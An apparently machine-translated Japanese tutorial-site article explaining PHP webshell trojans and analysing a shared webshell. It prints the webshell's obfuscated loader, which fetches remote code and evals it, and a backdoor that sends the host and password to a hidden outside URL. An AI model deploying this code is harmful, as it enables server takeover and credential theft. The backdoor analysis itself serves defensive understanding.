phpマレーシアとは何ですか

大马: トロイの木馬ウイルスのこと; php Dama は、サイトの権限を抽出するために PHP で書かれたプログラムであり、権限を昇格したり、サイトを変更したりする機能があるため、トロイの木馬と呼ばれています。

#誰かが php Malaysia を共有しました (WAF 経由だと言われています)。その 80% にはバックドアがあり、簡単に分析してみました (推奨学習: PHP ビデオ チュートリアル)

<?php
      $password=&#39;Shiqi&#39;;//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION[&#39;PhpCode&#39;])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION[&#39;PhpCode&#39;]=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode(&#39;MTAx&#39;));
@eval($un($_SESSION[&#39;PhpCode&#39;]));
?>

$url、$get、$un 合計 3 つの変数があります。まず、いくつかの変数を ascii 変換します。それが何であるかを確認するには、echo を使用して出力してください。

これは、base64 と gzinflate に基づく単純な暗号化です

バックドア部分:

if(isset($_GET['login'])=='geturl'){

    @set_time_limit(10);

    $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = envlpass;

    $copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');

    $url=$copyurl.$serveru.'&pass='.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

function geturl(){

    @set_time_limit(10);

    $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = envlpass;

    $copyurl = base64_decode('');

    $url=$copyurl.$serveru.'&p='.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

以上がphpマレーシアとは何ですかの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。